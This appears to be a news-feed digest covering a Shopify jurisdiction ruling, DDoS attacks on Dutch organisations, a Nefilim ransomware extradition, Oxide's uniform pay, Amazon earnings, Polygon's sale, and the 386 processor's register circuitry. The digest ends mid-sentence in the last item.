. To manage meeting load, eliminate all other broadcast meetings. This principle is one of the reasons we prefer small teams.
P. People are not fungible.
Team composition is critical. Our operating model is a sports team where we pick individuals for particular positions based on the needs of the team and their skill-sets. A second goalkeeper doesn’t help a soccer team much, even if they are absolutely stellar at what they do. Good managers will often do their best to make engineers fungible, in order to reduce personnel risk to the project; but in a true skunkworks team, nobody is fungible.
Q. Run towards risk.
In skunkworks mode, the goal is to reduce technical risk as quickly as possible. Accordingly, the team has to surge on areas where risk is high. Fight the temptation to make steady progress on well-understood, low-risk parts of the system.
R. Keep the team small.
This one seems obvious but is notoriously difficult to enforce in large companies, for a number of reasons. A well-meaning manager might add engineers to a project to 1) make it go faster; and 2) reward the engineer. But we’ve known for
50 years
(!) that software projects actually do not go faster if you add people to them
2
. And adding the wrong type of engineer can often hurt the project and the engineer’s career (see rule P about goalkeepers). Critically, keeping the team small ensures that it’s always resource-constrained (see rule K about ruthless prioritization); and also protects the project against cost-cutting initiatives (since the company doesn’t significantly reduce cost by shutting the project down).
I hope these rules help managers and engineers find common ground – good luck starting your own clean-slate skunkworks projects!
Footnotes:
Ninth Circuit Hands Users A Big Win: Californians Can Sue Out-of-State Corporations That Violate State Privacy Laws
Electronic Frontier Foundation
www.eff.org
2025-05-01 21:06:17
Simple common sense tells us that a corporation’s decision to operate in every state shouldn’t mean it can’t be sued in most of them. Sadly, U.S. law doesn’t always follow common sense. That’s why we were so pleased with a recent holding from the Ninth Circuit Court of Appeals. Setting a crucial pre...
Simple common sense tells us that a corporation’s decision to operate in
every
state shouldn’t mean it can’t be sued in most of them. Sadly, U.S. law doesn’t always follow common sense. That’s why we were so pleased with a
recent holding
from the Ninth Circuit Court of Appeals. Setting a crucial precedent, the court held that consumers can sue national or multinational companies in the consumers’ home courts if those companies violate state data privacy laws.
The case,
Briskin v. Shopify
, stems from a California resident’s allegations that Shopify, a company that offers back-end support to e-commerce companies around the U.S. and the globe, installed tracking software on his devices without his knowledge or consent, and used it to secretly collect data about him. Shopify also allegedly tracked users’ browsing activities across multiple sites and compiled that information into comprehensive user profiles, complete with financial “risk scores” that companies could use to block users’ future purchases. The Ninth Circuit initially dismissed the lawsuit for lack of personal jurisdiction, ruling that Shopify did not have a close enough connection to California to be fairly sued there. Collecting data on Californians along with millions of other users was not enough; to be sued in California, Shopify had to do something to target Californians in particular.
Represented by nonprofit
Public Citizen
, Briskin asked the court to rehear the case
en banc
(meaning, review by the full court rather than just a three-judge panel). The court agreed and invited further briefing. After that review, the court vacated the earlier holding, agreeing with the plaintiff (and EFF’s argument in a
supporting amicus brief
) that Shopify’s extensive collection of information from users
in other states
should not prevent California plaintiffs from having their day in court in their home state.
The key issue was whether Shopify’s actions were “expressly aimed” at California. Shopify argued that it was “mere happenstance” that its conduct affected a consumer in California, arising from the consumer’s own choices. The Ninth Circuit rejected that theory, noting:
Pre-internet, there would be no doubt that the California courts would have specific personal jurisdiction over a third party who physically entered a Californian’s home by deceptive means to take personal information from the Californian’s files for its own commercial gain. Here, though Shopify’s entry into the state of California is by electronic means, its surreptitious interception of Briskin’s personal identifying information certainly is a relevant contact with the forum state.
The court further noted that the harm in California was not “mere happenstance” because, among other things, Shopify allegedly knew plaintiff's location either prior to or shortly after installing its initial tracking software on his device as well as those of other Californians.
Importantly, the court overruled earlier cases that had suggested that “express aiming” required the plaintiff to show that a company “targeted” California in particular. As the court recognized, such a requirement would have the
perverse effect of allowing a corporation to direct its activities toward all 50 states yet to escape specific personal jurisdiction in each of those states for claims arising from or relating to the relevant contacts in the forum state that injure that state’s residents.
Instead, the question is whether Shopify’s
own
conduct connected it to California in a meaningful way. The answer was a resounding
yes
, for multiple reasons:
Shopify knows about its California consumer base, conducts its regular business in California, contacts California residents, interacts with them as an intermediary for its merchants, installs its software onto their devices in California, and continues to track their activities.
In other words, a company can’t deliberately collect a bunch of information about a person in a given state,
including where they are located
, use that information for its own commercial purposes, and then claim it has little or no relationship with that state.
As states around the country seek to fill the gaps left by Congress’ failure to pass comprehensive data privacy legislation, this ruling helps ensure that those state laws will have real teeth. In an era of ever-increasing corporate surveillance, that’s a crucial win.
Join EFF Lists
Pro-Russia hacktivists bombard Dutch public orgs with DDoS attacks
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 21:04:26
Russia-aligned hacktivists persistently target key public and private organizations in the Netherlands with distributed denial of service (DDoS) attacks, causing access problems and service disruptions. [...]...
Russia-aligned hacktivists persistently target key public and private organizations in the Netherlands with distributed denial of service (DDoS) attacks, causing access problems and service disruptions.
The situation was acknowledged via a statement by the country's National Cyber Security Center (NCSC), part of the Dutch Ministry of Justice.
"This week, several Dutch organizations have been targeted by large-scale DDoS attacks,"
reads the NCSC announcement
.
"The DDoS attacks are directed at both Dutch and other European organizations. Within the Netherlands, both public and private entities are being attacked."
The NCSC noted that the attacks were claimed by the hacktivist group named NoName057(16) on the threat actor's Telegram channel.
Source: BleepingComputer
Although the NCSC said the threat actor's motive is unclear, NoName057(16) declared it was retribution for the Netherlands sending €6 billion in military aid to Ukraine and planning to allocate another €3.5 billion in 2026.
The threat group's latest message on Telegram from yesterday indicates that the attacks continue.
Source: BleepingComputer
According to
local media outlets
, the DDoS attacks have impacted the provinces of Groningen, Noord-Holland, Zeeland, Drenthe, Overijssel, Noord-Brabant, and the municipalities of Apeldoorn, Breda, Nijmegen, and Tilburg.
The online portals of these public organizations were reportedly unreachable for several hours this week, though according to officials, there has been no compromise of internal systems or data.
NoName057(16) is a threat actor that, since March 2022, has had
significant involvement
in numerous DDoS attacks targeting European and American organizations.
The threat group even launched a crowdsourced DDoS platform called '
DDoSIA
' where "volunteers" would get paid to lend their firepower in attacks.
The platform became very successful, recruiting
thousands of users
in under a year and launching multiple disruptive attacks on Western entities.
In July 2024, the Spanish authorities
arrested three members
of DDoSIA and seized their devices for further investigation.
However, there was no significant follow-up in the operation, and the leaders of the threat group have not been named or indicted yet, and so the DDoS attacks continue.
Four years ago, we were struggling to hire. Our team was small (~23
employees), and we knew that we needed many more people to execute on our
audacious vision
. While we had
had success hiring in our personal networks, those networks now felt tapped;
we needed to get further afield. As is our wont, we got together as a team
and brainstormed: how could we get a bigger and broader applicant pool? One
of our engineers, Sean, shared some personal experience: that
Oxide’s principles and values
were very
personally important to him — but that when he explained them to people
unfamiliar with the company, they were (understandably?) dismissed as
corporate claptrap. Sean had found, however, that there was one surefire way
to cut through the skepticism: to explain our approach to compensation.
Maybe, Sean wondered, we should talk about it publicly?
"I could certainly write a blog entry explaining it," I offered. At this
suggestion, the team practically lunged with enthusiasm: the reaction was so
uniformly positive that I have to assume that everyone was sick of explaining
this most idiosyncratic aspect of Oxide to friends and family. So what was
the big deal about our compensation? Well, as a I wrote in the resulting
piece,
Compensation
as a Reflection of Values
, our compensation is not merely transparent, but
uniform. The piece — unsurprisingly, given the evergreen hot topic that is
compensation — got a ton of attention. While some of that attention was
negative (despite the piece trying to frontrun every HN hater!), much of it was
positive — and everyone seemed to be at least intrigued.
And in terms of its initial purpose, the piece succeeded beyond our wildest
imagination: it brought a surge of new folks interested in the company. Best
of all, the people new to Oxide were interested for all of the right reasons:
not the compensation
per se
, but for the values that the compensation
represents. The deeper they dug, the more they found to like — and many who
learned about Oxide for the first time through that blog entry we now count as
long-time, cherished colleagues.
That blog entry was a long time ago now, and today we have ~75 employees
(and a
shipping product
!);
how is our compensation model working out for us?
Before we get into our deeper findings, two updates that are so important that
we have updated the blog entry itself. First, the dollar figure itself
continues to increase over time (as of this writing in 2025, $207,264);
things definitely haven’t gotten (and aren’t
getting!) any cheaper. And second, we
did
introduce variable compensation for
some sales roles. Yes, those roles can make more than the rest of us — but
they can also make less, too. And, importantly: if/when those folks are
making more than the rest of us, it’s because they’re selling a lot — a
result that can be celebrated by everyone!
Those critical updates out of the way, how is it working? There have been a
lot of surprises along the way, mostly (all?) of the positive variety. A
couple of things that we have learned:
People take their own performance really seriously.
When some outsiders
hear about our compensation model, they insist that it can’t possibly work
because "everyone will slack off." I have come to find this concern to be more
revealing of the person making the objection than of our model, as our
experience has been in fact the opposite: in my one-on-one conversations with
team members, a frequent subject of conversation is people who are concerned
that they aren’t doing enough (or that they aren’t doing the right thing, or
that their work is progressing slower than they would like). I find my job is
often to help quiet this inner critic while at the same time stoking what I
feel is a healthy urge: when one holds one’s colleagues in high regard, there
is an especially strong desire to help contribute — to prove oneself worthy
of a superlative team. Our model allows people to focus on their own
contribution (whatever it might be).
People take hiring
really
seriously.
When evaluating a peer (rather
than a subordinate), one naturally has high expectations — and because (in
the sense of our wages, anyway) everyone at Oxide is a peer, it shouldn’t be
surprising that folks have very high expectations for potential future
colleagues. And because the
Oxide hiring process
is writing
intensive, it allows for candidates to be thoroughly reviewed by Oxide
employees — who are tough graders! It is, bluntly, really hard to get
a job at Oxide.
It allows us to internalize the importance of different roles.
One of the
more incredible (and disturbingly frequent) objections I have heard is: "But
is that what you’ll pay support folks?" I continue to find this question
offensive, but I no longer find it surprising: the specific dismissal of
support roles reveals a widespread and corrosive devaluation of those closest
to customers. My rejoinder is simple: think of the best support engineers
you’ve worked with; what were they worth? Anyone who has shipped complex
systems knows these extraordinary people — calm under fire, deeply technical,
brilliantly resourceful, profoundly empathetic — are invaluable to the
business. So what if you built a team entirely of folks like that? The
response has usually been: well, sure, if you’re going to only hire
those
folks. Yeah, we are — and we have!
It allows for fearless versatility.
A bit of a corollary to the
above, but subtly different: even though we (certainly!) hire and select for
certain roles, our uniform compensation means we can in fact think primarily
in terms of
people
unconfined by those roles. That is, we can be very fluid
about what we’re working on, without fear of how it will affect a perceived
career trajectory. As a concrete example: we had a large customer that wanted
to put in place a program for some of the additional work they wanted to see
in the product. The complexity of their needs required dedicated program
management resources that we couldn’t spare, and in another more static
company we would have perhaps looked to hire. But in our case, two folks came
together — CJ from operations, and Izzy from support — and did something
together that was in some regards new to both of them (and was neither of
their putative full-time jobs!) The result was indisputably successful: the
customer loved the results, and two terrific people got a chance to work
closely together without worrying about who was dotted-lined to whom.
It has allowed us to organizationally scale.
Many organizations describe
themselves as flat, and a reasonable rebuttal to this are the "shadow
hierarchies" created by the
tyranny of
structurelessness
. And indeed, if one were to read (say)
Valve’s
(in)famous handbook
, the autonomy seems great — but the stack ranking
decidedly less so, especially because the handbook is conspicuously silent on
the subject of compensation. (Unsurprisingly,
compensation
was weaponized at Valve
, which descended into
toxic
cliquishness
.) While we believe that autonomy
is
important to do one’s best
work, we also have a clear structure at Oxide in that Steve Tuck (Oxide
co-founder and CEO) is
in charge. He has to be: he is held accountable to our investors — and he
must have the latitude to make decisions. Under Steve, it is true that
we
don’t
have layers of middle management. Might we need some in the
future? Perhaps, but what fraction of middle management in a company is
dedicated to — at some level — determining who gets what in terms of
compensation? What happens when you eliminate that burden completely?
It frees us to both lead and follow.
We expect that
every Oxide employee has the capacity to lead others — and we tap this
capacity frequently. Of course, a company in which everyone is trying to
direct all traffic all the time would be a madhouse, so we also very much rely
on following one another too! Just as our compensation model allows us to
internalize the values of different roles, it allows us to appreciate the
value of
both
leading and following, and empowers us each with the judgement
to know when to do which. This isn’t always easy or free of ambiguity, but
this particular dimension of our versatility has been essential — and
our compensation model serves to encourage it.
It causes us to hire carefully and deliberately.
Of course, one should
always
hire carefully and deliberately, but this often isn’t the case — and
many a startup has been ruined by reckless expansion of headcount. One of the
roots of this can be found in a dirty open secret of Silicon Valley middle
management: its ranks are taught to grade their career by the number of
reports in their organization. Just as if you were to compensate software
engineers based on the number of lines of code they wrote, this results in
perverse incentives and predictable disasters — and any Silicon Valley vet
will have plenty of horror stories of middle management jockeying for reqs or
reorgs when they should have been focusing on product and customers. When
you can eliminate middle management, you eliminate this incentive. We grow
the team not because of someone’s animal urges to have the largest possible
organization, but rather because we are at a point where adding people will
allow us to better serve our market and customers.
It liberates feedback from compensation.
Feedback is, of course, very
important: we all want to know when and where we’re doing the right thing!
And of course, we want to know too where there is opportunity for improvement.
However, Silicon Valley has historically tied feedback so tightly to
compensation that it has ceased to even pretend to be constructive: if it
needs to be said, performance review processes aren’t, in fact, about
improving the performance of the team, but rather quantifying and
stack-ranking that performance for purposes of compensation. When
compensation is moved aside, there is a kind of liberation for feedback
itself: because feedback is now entirely earnest, it can be expressed and
received thoughtfully.
It allows people to focus on doing the right thing.
In a world of
traditional, compensation-tied performance review, the organizational priority
is around those things that affect compensation — even at the expense of
activity that clearly benefits the company. This leads to all sorts of wild
phenomena, and most technology workers will be able to tell stories of doing
things that we’re clearly right for the company, but having to hide it from
management that thought only narrowly in terms of their own stated KPIs and
MBOs. By contrast, over and over (and over!) again, we have found that people
do the right thing at Oxide — even if (especially if?) no one is looking.
The beneficiary of that right thing? More often than not, it’s our customers,
who have uniformly praised the team for going above and beyond.
It allows us to focus on the work that matters.
Relatedly, when
compensation is non-uniform, the process to figure out (and maintain) that
non-uniformity is laborious. All of that work — of line workers assembling
packets explaining themselves, of managers arming themselves with those
packets to fight in the arena of organizational combat, and then of those same
packets ultimately being regurgitated back onto something called a review — is
work
. Assuming such a process is executed perfectly (something which I
suppose is possible in the abstract, even though I personally have never seen
it), this is work that does not in fact advance the mission of the company.
Not having variable compensation gives us all of that time and energy back to
do the
actual
work — the stuff that matters.
It has stoked an extraordinary sense of teamwork.
For me personally — and
as
I relayed on an episode
of
Software Misadventures
— the highlights of my career have been being a
part of an extraordinary team. The currency of a team is mutual trust, and
while uniform compensation certainly isn’t the only way to achieve that trust,
boy does it ever help! As Steve and I have told one another more times that
we can count: we are so lucky to work on this team, with its extraordinary
depth and breadth.
While our findings have been very positive, I would still reiterate what we
said four years ago: we don’t know what the future holds, and it’s easier to
make an unwavering commitment to the transparency rather than the uniformity.
That said, the uniformity has had so many positive ramifications that the model
feels more important than ever. We are beyond the point of this being a
curiosity; it’s been essential for building a mission-focused team taking on
a problem larger than ourselves. So it’s not a fit for everyone — but if
you are seeking an extraordinary team solving hard problems in service to
customers,
consider Oxide
!
Amazon to report earnings as investors weigh effects of Trump’s tariffs
Guardian
www.theguardian.com
2025-05-01 20:44:52
Tech giant exceeded expectations for past two quarters, but expected to report slowest revenue growth rate since 2022 Amazon will report its first-quarter earnings for the 2025 fiscal year on Thursday after the New York stock exchange closes – results that will be seen in the context of consumer res...
Amazon
reported strong first-quarter earnings for the 2025 fiscal year on Thursday after the New York stock exchange closed – results that will be seen in the context of consumer resilience in the face of
Donald Trump
’s tariff wars.
Amazon reported $1.59 in earnings-per-share (EPS) and revenue of $155.67bn. Analysts had estimated that the company’s EPS would come in at $1.36 on revenue of $155bn. In particular focus: Amazon’s advertising business, which grew 19% in the first quarter of 2025, handily exceeding analyst expectations as well. The company has exceeded Wall Street’s expectations for the previous two quarters. At the close of the first quarter last year, the company reported earnings of $0.98 per share on sales of $143bn. In spite of the growth, shares dropped in after-hours trading.
Amazon’s earnings report comes as its stock price has dropped 17% this year over fears that consumers will cut back on purchases in response to the US president’s tariffs. A large number of products on Amazon ship from China, which faces a tariff of a whopping 145% imposed by Trump. The company is expected to report its slowest rate of revenue growth for any period since 2022. Poor consumer sentiment numbers alongside gross domestic product figures reported this week showed the US economy contracting at a 0.3% annualized pace in the first quarter.
Amazon’s earnings are a backdrop for how the “magnificent seven” tech giants are learning how to deal with the Trump administration and its ongoing trade war with China and other countries.
Meta
and
Microsoft
reported strong earnings on Wednesday despite the uncertainty brought on by the tariffs, though their businesses are somewhat more insulated from duties imposed on imports than Amazon.
Analysts at UBS said in a note to clients that at least 50% of items sold on Amazon are subject to Trump’s tariffs and could become more expensive as a result.
“Consumers therefore might have to make more difficult choices on where to allocate their dollars,” UBS analysts said.
Earlier this month, Amazon CEO, Andy Jassy,
told CNBC
that Amazon has not seen a drop-off in consumer demand and the company is “going to try and do everything we can” to keep prices low for customers. But he acknowledged some third-party sellers will “need to pass that cost” of tariffs on to consumers.
Earlier this week, the company found itself in the White House crosshairs after a report said that the online retail giant was planned to itemize tariff-related increases in pricing. White House press secretary, Karoline Leavitt,
called the move
a “hostile and political act”.
Amazon denied the reports in a statement, saying the plan was “never approved” and displaying tariff costs is “not going to happen”.
Trump reportedly put in a call to Amazon co-founder
Jeff Bezos
on Tuesday morning. “Jeff Bezos was very nice. He was terrific,” he later told reporters. “He solved the problem very quickly. Good guy.”
But Massachusetts senator Elizabeth Warren criticized the tense exchange, asking in
a letter
if Bezos received any “promises or favors” from Trump in exchange for his “subservience” and said it raised concerns “about the potential for tariff-related corruption”.
Ukrainian extradited to US for Nefilim ransomware attacks
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 20:44:03
A Ukrainian national has been extradited from Spain to the United States to face charges over allegedly conducting Nefilim ransomware attacks against companies. [...]...
A Ukrainian national has been extradited from Spain to the United States to face charges over allegedly conducting Nefilim ransomware attacks against companies.
The suspect, Artem Aleksandrovych Stryzhak, 35, was arrested in Spain in June 2024 and extradited to the U.S. on April 30, 2025.
According to the U.S. Department of Justice, Stryzhak allegedly participated in ransomware attacks that targeted high-revenue companies, primarily in the United States, Norway, France, Switzerland, Germany, and the Netherlands.
In June 2021, Stryzhak allegedly became an affiliate of the Nefilim ransomware operation in exchange for 20% of any ransom payments he generated from attacks.
Stryzhak and his co-conspirators researched potential targets using online platforms to gather information about a company's revenue, size, and contact details. One of the more popular sites used by ransomware gangs to research targets is Zoominfo.
"In one exchange with Stryzhak in or about July 2021, a Nefilim administrator encouraged him to target companies in these countries with more than $200 million in annual revenue," reads the DOJ's
press release
.
When conducting attacks, Nefilim affiliates breach corporate networks, steal data, and then encrypt devices using the ransomware encryptor. The attackers then demand a ransom payment in bitcoin to receive the decryption key and for stolen data not to be leaked. If a victim refuses to pay, the attackers publish the stolen data online on data leak sites.
The
Nefilim ransomware launched in 2020
, sharing much of its code with the Nemty ransomware. The ransomware encrypted files using AES-128 encryption and appended the ".NEFILIM" file extension to encrypted files.
Ransom notes named "NEFILIM-DECRYPT.txt" were created throughout the device's file system, warning that stolen data would be leaked within seven days if negotiations were not started.
Nefilim ransom note
Source: BleepingComputer
Nefilim is believed to have later rebranded under other names, including Fusion, Milihpen, Gangbang, Nemty, and
Karma
.
Stryzhak is charged with conspiracy to commit fraud and related activity, including extortion, in connection with computers. The indictment was unsealed in federal court in Brooklyn, where Stryzhak is scheduled for arraignment before U.S. Magistrate Judge Robert M. Levy.
If convicted, Stryzhak faces up to five years in prison.
Polygon Acquired by Porn Mogul Who Co-Founded Brazzers
403 Media
www.404media.co
2025-05-01 20:35:53
Before he founded Valnet, Hassan Youssef started one of the biggest porn sites on the internet....
Polygon, Vox Media’s video games website, has been acquired by Valnet, a company founded and helmed by Hassan Youssef, a former pornography mogul and the co-founder of the popular adult entertainment site Brazzers.
The news, which broke first on social media via various Polygon writers and editors saying that they suddenly don’t have a job, came as a shock to both Polygon staff and readers. Media in general has been suffering from regular layoffs for years, and video game publications have been hit especially hard recently with legendary magazine
Game Informer shutting down
in 2024 (and
recently being revived
) and
layoffs at Gamespot
and other publications. But Polygon, a brand that Vox built from scratch, has a large staff, excellent reporters, a sizable YouTube presence, and relatively less clownish leadership than new media counterpart VICE, did not seem like it was about to be sold and lay off much of its staff.
Valnet media owns several entertainment sites including Screen Rant and Collider, as well as a number of video game sites like TheGamer, DualShockers, and Game Rant. In March,
The Wrap
published a story which accused Valnet of exploitative working conditions. Valnet
filed a lawsuit
against The Wrap over the article which it claimed was inaccurate and defamatory.
As the lore has it
, Youssef’s story began in 2003 as part of a foosball enthusiasts group including his brother Sam and fellow Concordia University students Matt Keezer and Stephane Manos. They saw an opportunity to make a lot of money in internet porn and started Jugg World, Ass Listing, KeezMovies and XXX Rated Chicks. Eventually, they turned Jugg World into an affiliate network, and opened Brazzers as a pay site.
Some might attribute the popularity of giant boobs in porn to these guys’ single-minded search for cheap and easy profit; former Mindgeek CEO Feras Antoon
told
New York Magazine
they focused on breasts “because the big-tits niche was so cheap,” and then “they saw, wow, that tit niche is huge. Then they realized that the MILF niche—the older-woman niche—is even bigger. And they became the masters of the big-tit–MILF niche.”
Sam and Hassan went on to cofound Valnet. Hassan serves as its current CEO while Sam is a board member and also the founder and CEO of Valsoft, an enterprise software company.
“This moment marks a powerful reaffirmation of our deep commitment to gaming, a space we’ve passionately invested in for years,” Youssef, who is now Valnets founder and SEO, said in a press release on Thursday. “The addition of Polygon not only strengthens our editorial muscle but also amplifies our ability to deliver unmatched value to both audiences and advertisers. At Valnet, we’re not just participants in this space; we are its undisputed leader, and today, that leadership has never felt stronger.”
Whatever value Youssef sees in Polygon apparently doesn’t include many of the people who made the site what it is.
About the author
Sam Cole is writing from the far reaches of the internet, about sexuality, the adult industry, online culture, and AI. She's the author of How Sex Changed the Internet and the Internet Changed Sex.
About the author
Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
The absurdly complicated circuitry for the 386 processor's registers
The groundbreaking Intel 386 processor (1985) was the first 32-bit processor in the x86 architecture.
Like most processors, the 386 contains numerous registers; registers are a key part of a processor because
they provide storage that is much faster than main memory.
The register set of the 386 includes general-purpose registers, index registers, and segment selectors, as well
as registers with special functions for memory management and operating system implementation.
In this blog post, I look at the silicon die of the 386 and explain how the processor implements its main registers.
It turns out that the circuitry that implements the 386's registers is much more complicated than one would expect.
For the 30 registers that I examine, instead of using a standard circuit, the 386 uses
six
different circuits,
each one optimized for the particular characteristics of the register.
For some registers, Intel squeezes register cells together to double the storage capacity.
Other registers support accesses of 8, 16, or 32 bits at a time.
Much of the register file is "triple-ported", allowing two registers to be read simultaneously while a value is written
to a third register.
Finally, I was surprised to find that registers don't store bits in order: the lower 16 bits of each register are interleaved, while the upper 16 bits are stored linearly.
The photo below shows the 386's shiny fingernail-sized silicon die under a special metallurgical microscope.
I've labeled the main functional blocks.
For this post, the Data Unit in the lower left quadrant of the chip is the relevant component.
It consists of the 32-bit arithmetic logic unit (ALU) along
with the processor's main register bank (highlighted in red at the bottom).
The circuitry, called the datapath, can be viewed as the heart of the processor.
This die photo of the 386 shows the location of the registers. Click this image (or any other) for a larger version.
The datapath is built with a regular structure: each register or ALU functional unit is a horizontal stripe of circuitry,
forming the horizontal bands visible in the image.
For the most part, this circuitry consists of a carefully optimized circuit copied 32 times, once for each bit of the processor.
Each circuit for one bit is exactly the same width—60 µm—so the functional blocks can be stacked together like microscopic
LEGO bricks.
To link these circuits,
metal bus lines run vertically through the datapath in groups of 32, allowing data to flow up and down through the blocks.
Meanwhile, control lines run horizontally, enabling ALU operations or register reads and writes; the irregular circuitry
on the right side of the Data Unit produces the signals for these control lines, activating the appropriate control
lines for each instruction.
The datapath is highly structured to maximize performance while minimizing its area on the die.
Below, I'll look at how the registers are implemented according to this structure.
A processor's registers are one of the most visible features of the processor architecture.
The 386 processor contains 16 registers for use by application programmers, a small number by modern standards,
but large enough for the time.
The diagram below shows the eight 32-bit general-purpose registers.
At the top are four registers called EAX, EBX, ECX, and EDX.
Although these registers are 32-bit registers, they can also be treated as 16 or 8-bit registers for backward
compatibility with earlier processors.
For instance, the lower half of EAX can be accessed as the 16-bit register AX, while the bottom byte of EAX can
be accessed as the 8-bit register AL.
Moreover, bits 15-8 can also be accessed as an 8-bit register called AH.
In other words, there are four different ways to access the EAX register, and similarly for the other three registers.
As will be seen, these features complicate the implementation of the register set.
The bottom half of the diagram shows that the 32-bit EBP, ESI, EDI, and ESP registers can also be treated as 16-bit registers BP, SI, DI, and SP. Unlike the previous registers,
these ones cannot be treated as 8-bit registers.
The 386 also has six segment registers that define the
start of memory segments; these are 16-bit registers.
The 16 application registers are rounded out by the status flags and instruction pointer (EIP);
they are viewed as 32-bit registers, but their implementation is more complicated.
The 386 also has numerous registers for operating system programming, but I won't discuss them here, since they
are likely in other parts of the chip.
1
Finally, the 386 has numerous temporary registers that are not visible to the programmer but are used by the microcode
to perform complex instructions.
The 6T and 8T static RAM cells
The 386's registers are implemented with static RAM cells, a circuit that can hold one bit.
These cells are arranged into a grid to provide multiple registers.
Static RAM can be contrasted with the dynamic RAM that computers use for their main memory:
dynamic RAM holds each bit in a tiny capacitor, while static RAM uses a faster but larger and more complicated circuit.
Since main memory holds gigabytes of data, it uses dynamic RAM to provide dense and inexpensive storage.
But the tradeoffs are different for registers: the storage capacity is small, but speed is of the essence.
Thus, registers use the static RAM circuit that I'll explain below.
The concept behind a static RAM cell is to connect two inverters into a loop.
If an inverter has a "0" as input, it will output a "1", and vice versa.
Thus, the inverter loop will be stable,
with one inverter on and one inverter off, and each inverter supporting the other.
Depending on which inverter is on, the circuit stores a 0 or a 1, as shown below.
Thus, the pair of inverters provides one bit of memory.
Two inverters in a loop can store a 0 or a 1.
To be useful, however, the inverter loop needs a way to store a bit into it, as well as a way to read out the stored bit.
To write a new value into the circuit, two signals are fed in, forcing the inverters to the desired new values.
One inverter receives the new bit value, while the other inverter receives the complemented bit value.
This may seem like a brute-force way to update the bit, but it works.
The trick is that the inverters in the cell are small and weak, while the input signals are higher current,
able to overpower the inverters.
2
These signals are fed in through wiring called "bitlines"; the bitlines can also be used to read the value
stored in the cell.
By adding two pass transistors to the circuit, the cell can be read and written.
To control access to the register,
the bitlines are connected to the inverters through pass transistors, which act as switches to
control access to the inverter loop.
3
When the pass transistors are on, the
signals on the write lines can pass through to the inverters. But when the pass transistors are off, the
inverters are isolated from the write lines.
The pass transistors are turned on by a control signal, called a "wordline" since it controls access to a word
of storage in the register.
Since each inverter is constructed from two transistors, the circuit above consists of six transistors—thus this circuit is called a "6T" cell.
The 6T cell uses the same bitlines for reading and writing, so you can't read and write to registers simultaneously.
But adding two transistors creates an "8T" circuit that lets you read from one register
and write to another register at the same time. (In technical terms, the register file is two-ported.)
In the 8T schematic below, the two additional transistors (G and H) are used for reading.
Transistor G buffers the cell's value; it turns on if the inverter output is high, pulling the read output bitline low.
4
Transistor H is a pass transistor that blocks this signal until a read is performed on this register;
it is controlled by a read wordline.
Note that there are two bitlines for writing (as before) along with one bitline for reading.
Schematic of a storage cell. Each transistor is labeled with a letter.
To construct registers (or memory), a grid is constructed from these cells.
Each row corresponds to a register, while each column corresponds to a bit position.
The horizontal lines are the wordlines, selecting which word to access, while the
vertical lines are the bitlines, passing bits in or out of the registers.
For a write, the vertical bitlines provide the 32 bits (along with their complements).
For a read, the vertical bitlines receive the 32 bits from the register.
A wordline is activated to read or write the selected register.
To summarize: each row is a register, data flows vertically, and control signals flow horizontally.
Static memory cells (8T) organized into a grid.
Six register circuits in the 386
The die photo below zooms in on the register circuitry in the lower left corner of the 386 processor.
You can see the arrangement of storage cells into a grid, but note that the pattern changes from row to row.
This circuitry implements 30 registers: 22 of the registers hold 32 bits, while the bottom ones are 16-bit registers.
By studying the die, I determined that there are six different register circuits,
which I've arbitrarily labeled (
a
) to (
f
).
In this section, I'll describe these six types of registers.
The 386's main register bank, at the bottom of the datapath. The numbers show how many bits of the register can be accessed.
I'll start at the bottom with the simplest circuit: eight 16-bit registers that I'm calling type (
f
).
You can see a "notch" on the left side of the register file
because these registers are half the width of the other registers (16 bits versus 32 bits).
These registers are implemented with the 8T circuit described earlier, making them dual ported:
one register can be read while another register is written.
As described earlier, three vertical bus lines pass through each bit: one bitline for reading and two bitlines
(with opposite polarity)
for writing.
Each register has two control lines (wordlines): one to select a register for reading and another to select a register for writing.
The photo below shows how four cells of type (
f
) are implemented on the chip.
In this image, the chip's two metal layers have been removed along with most of the polysilicon wiring, showing the underlying silicon.
The dark outlines indicate regions of doped silicon, while the stripes across the doped region correspond to transistor
gates.
I've labeled each transistor with a letter corresponding to the earlier schematic.
Observe that the layout of the bottom half is a mirrored copy of the upper half, saving a bit of space.
The left and right sides are approximately mirrored; the irregular shape allows separate read and wite wordlines
to control the left and right halves without colliding.
Four memory cells of type (
f
), separated by dotted lines. The small irregular squares are remnants of polysilicon
that weren't fully removed.
The 386's register file and datapath are designed with 60 µm of width assigned to each bit.
However, the register circuit above is unusual:
the image above is 60 µm wide but there are two register cells side-by-side.
That is, the circuit crams
two
bits in 60 µm of width, rather than one.
Thus, this dense layout implements two registers per row (with interleaved bits), providing twice the density of the other register circuits.
If you're curious to know how the transistors above are connected,
the schematic below shows how the physical arrangement of the transistors above corresponds to two of the 8T memory cells
described earlier.
Since the 386 has two overlapping layers of metal, it is very hard to interpret a die photo with the metal layers.
But see my
earlier article
if you want these photos.
Schematic of two static cells in the 386, labeled "R" and "L" for "right" and "left". The schematic approximately matches the physical layout.
Above the type (
f
) registers are 10 registers of type (
e
), occupying five rows of cells.
These registers are the same 8T implementation as before, but these registers are 32 bits wide instead of 16.
Thus, the register takes up the full width of the datapath, unlike the previous registers.
As before, the double-density circuit implements two registers per row.
The silicon layout is identical (apart from being 32 bits wide instead of 16), so I'm not including a photo.
Above those registers are four (
d
) registers, which are more complex.
They are triple-ported registers, so one register can be written while two other registers are read.
(This is useful for ALU operations, for instance, since two values can be added and the result written back
at the same time.)
To support reading a second register, another vertical bus line is added for each bit.
Each cell has two more transistors to connect the cell to the new bitline.
Another wordline controls the additional read path.
Since each cell has two more transistors, there are 10 transistors in total and the circuit is called 10T.
Four cells of type (
d
). The striped green regions are the remnants of oxide layers that weren't completely removed, and can be ignored.
The diagram above shows four memory cells of type (
d
).
Each of these cells takes the full 60 µm of width, unlike the previous double-density cells.
The cells are mirrored horizontally and vertically;
this increases the density slightly since power lines can be shared between cells.
I've labeled the transistors
A
through
H
as before, as well as the two additional transistors
I
and
J
for the
second read line.
The circuit is the same as before, except for the two additional transistors, but
the silicon layout is significantly different.
Each of the (
d
) registers has five control lines. Two control lines select a register for reading, connecting the register
to one of the two vertical read buses.
The three write lines allow parts of the register to be written independently: the top 16 bits, the next 8 bits, or the
bottom 8 bits.
This is required by the x86 architecture, where a 32-bit register such as EAX can also be accessed as the 16-bit AX register,
